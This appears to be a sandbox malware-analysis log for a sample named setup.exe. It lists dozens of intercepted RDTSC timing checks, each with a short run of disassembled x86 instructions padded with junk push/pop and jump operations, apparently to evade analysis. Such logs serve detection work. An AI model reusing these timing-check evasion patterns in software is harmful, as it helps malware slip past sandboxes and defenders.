Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3C01AC second address: 3C01B2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3C0576 second address: 3C05BA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push edx 0x0000000e call 00007F47D8E3B0A8h 0x00000013 pop edx 0x00000014 mov dword ptr [esp+04h], edx 0x00000018 add dword ptr [esp+04h], 00000014h 0x00000020 inc edx 0x00000021 push edx 0x00000022 ret 0x00000023 pop edx 0x00000024 ret 0x00000025 mov edx, dword ptr [ebp+122D3818h] 0x0000002b push 0000001Eh 0x0000002d jmp 00007F47D8E3B0ABh 0x00000032 nop 0x00000033 push esi 0x00000034 push eax 0x00000035 push edx 0x00000036 jc 00007F47D8E3B0A6h 0x0000003c rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 367AF3 second address: 367B07 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jno 00007F47D8E48266h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 push edx 0x00000013 pop edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 367B07 second address: 367B1C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E3B0B1h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3E8236 second address: 3E8250 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F47D8E48275h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3E8250 second address: 3E8256 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3E8256 second address: 3E8260 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F47D8E48266h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3E8666 second address: 3E866A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3E87EF second address: 3E87F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3E8973 second address: 3E8979 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3E8979 second address: 3E897D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3E897D second address: 3E8993 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E3B0B2h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3E8AC1 second address: 3E8ACE instructions: 0x00000000 rdtsc 0x00000002 js 00007F47D8E48266h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3F1861 second address: 3F186B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F47D8E3B0A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3F1E0B second address: 3F1E11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3F1E11 second address: 3F1E19 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3F214F second address: 3F215A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F47D8E48266h 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3F22F9 second address: 3F22FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3F22FD second address: 3F230F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F47D8E4826Ch 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3F230F second address: 3F233C instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F47D8E3B0A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F47D8E3B0B9h 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push ecx 0x00000012 push edi 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 pop edi 0x00000016 push ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3F29C4 second address: 3F29E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F47D8E48276h 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3F12CE second address: 3F12D7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3F12D7 second address: 3F12DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop esi 0x00000007 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3F12DE second address: 3F12E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3F12E4 second address: 3F12E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3FD6AD second address: 3FD6D5 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F47D8E3B0B9h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jl 00007F47D8E3B0A6h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3FDCE6 second address: 3FDCEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3FDCEA second address: 3FDCF7 instructions: 0x00000000 rdtsc 0x00000002 js 00007F47D8E3B0A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3FDCF7 second address: 3FDCFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3FDFAB second address: 3FDFAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3FDFAF second address: 3FDFD5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007F47D8E48268h 0x0000000c jmp 00007F47D8E48275h 0x00000011 push edi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3FE285 second address: 3FE2A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F47D8E3B0B4h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3FE2A7 second address: 3FE2AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3FE2AB second address: 3FE2C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F47D8E3B0ADh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jp 00007F47D8E3B0A8h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3FE2C6 second address: 3FE2CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3FE2CC second address: 3FE2E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F47D8E3B0B3h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 401ABC second address: 401AC1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 401AC1 second address: 401B0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F47D8E3B0B2h 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c jng 00007F47D8E3B0AEh 0x00000012 jo 00007F47D8E3B0A6h 0x00000018 push edi 0x00000019 pop edi 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f push edx 0x00000020 pop edx 0x00000021 jmp 00007F47D8E3B0B9h 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 401B0A second address: 401B19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F47D8E4826Ah 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 401B19 second address: 401B23 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F47D8E3B0ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 401368 second address: 4013B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E48276h 0x00000007 jmp 00007F47D8E48273h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jg 00007F47D8E48268h 0x00000014 pop eax 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F47D8E48272h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4016C4 second address: 4016C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4016C9 second address: 4016E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F47D8E48274h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 403F9D second address: 403FA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 403FA5 second address: 403FBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F47D8E48270h 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3700B8 second address: 3700C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 pop eax 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3700C5 second address: 3700D1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pop edx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3700D1 second address: 3700D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 403B58 second address: 403B60 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 403CCA second address: 403CCE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 40AE6B second address: 40AE71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 40AE71 second address: 40AE75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 40AE75 second address: 40AE79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 40AE79 second address: 40AE7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 40AE7F second address: 40AEAF instructions: 0x00000000 rdtsc 0x00000002 jno 00007F47D8E4826Ch 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F47D8E4826Eh 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 je 00007F47D8E48266h 0x0000001f push edi 0x00000020 pop edi 0x00000021 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 40AEAF second address: 40AEC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F47D8E3B0ADh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 40AEC2 second address: 40AEE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F47D8E48279h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 40AEE1 second address: 40AEE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 40AEE5 second address: 40AEE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 40AEE9 second address: 40AEEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 409FD2 second address: 409FEC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E48276h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 409FEC second address: 409FFB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F47D8E3B0A6h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 409FFB second address: 40A001 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 40A001 second address: 40A01E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push esi 0x00000008 push ecx 0x00000009 push esi 0x0000000a pop esi 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F47D8E3B0AFh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 40A199 second address: 40A1CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edi 0x00000006 pushad 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jmp 00007F47D8E48278h 0x0000000f pop edx 0x00000010 jnc 00007F47D8E48268h 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 40A1CA second address: 40A1D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 40E420 second address: 40E46F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E48276h 0x00000007 push edi 0x00000008 jmp 00007F47D8E48274h 0x0000000d pop edi 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 jns 00007F47D8E4826Ah 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F47D8E48270h 0x0000001e push ebx 0x0000001f pop ebx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 40E5BC second address: 40E5C6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 40E5C6 second address: 40E5D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jc 00007F47D8E48266h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 40EA1B second address: 40EA27 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jp 00007F47D8E3B0A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4123D2 second address: 4123DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 push ebx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 412825 second address: 412852 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F47D8E3B0ACh 0x00000008 jp 00007F47D8E3B0A6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 jnp 00007F47D8E3B0B9h 0x00000017 jmp 00007F47D8E3B0B1h 0x0000001c pushad 0x0000001d popad 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 412852 second address: 412858 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4129B1 second address: 4129C9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F47D8E3B0B0h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4129C9 second address: 4129DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E4826Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 41A18C second address: 41A1BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F47D8E3B0B4h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F47D8E3B0B3h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 41A34B second address: 41A34F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 41A34F second address: 41A371 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F47D8E3B0B3h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jo 00007F47D8E3B0A6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 41A371 second address: 41A377 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 41A377 second address: 41A37C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 41A4E5 second address: 41A4F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jp 00007F47D8E48266h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 41A4F5 second address: 41A4F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 41AB34 second address: 41AB44 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a jns 00007F47D8E48266h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 41B3CC second address: 41B3E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E3B0B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 41B998 second address: 41B99D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 41B99D second address: 41B9A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 41B9A3 second address: 41B9A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 41BC2A second address: 41BC30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 41BC30 second address: 41BC34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 41BC34 second address: 41BC62 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F47D8E3B0B2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push edx 0x0000000d pop edx 0x0000000e jbe 00007F47D8E3B0A6h 0x00000014 ja 00007F47D8E3B0A6h 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d push edx 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 41BC62 second address: 41BC68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 42011D second address: 420133 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E3B0AEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 420133 second address: 420142 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F47D8E48266h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 420142 second address: 42014D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 42014D second address: 420151 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 420151 second address: 420170 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F47D8E3B0B6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 420170 second address: 420176 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 420176 second address: 42017C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
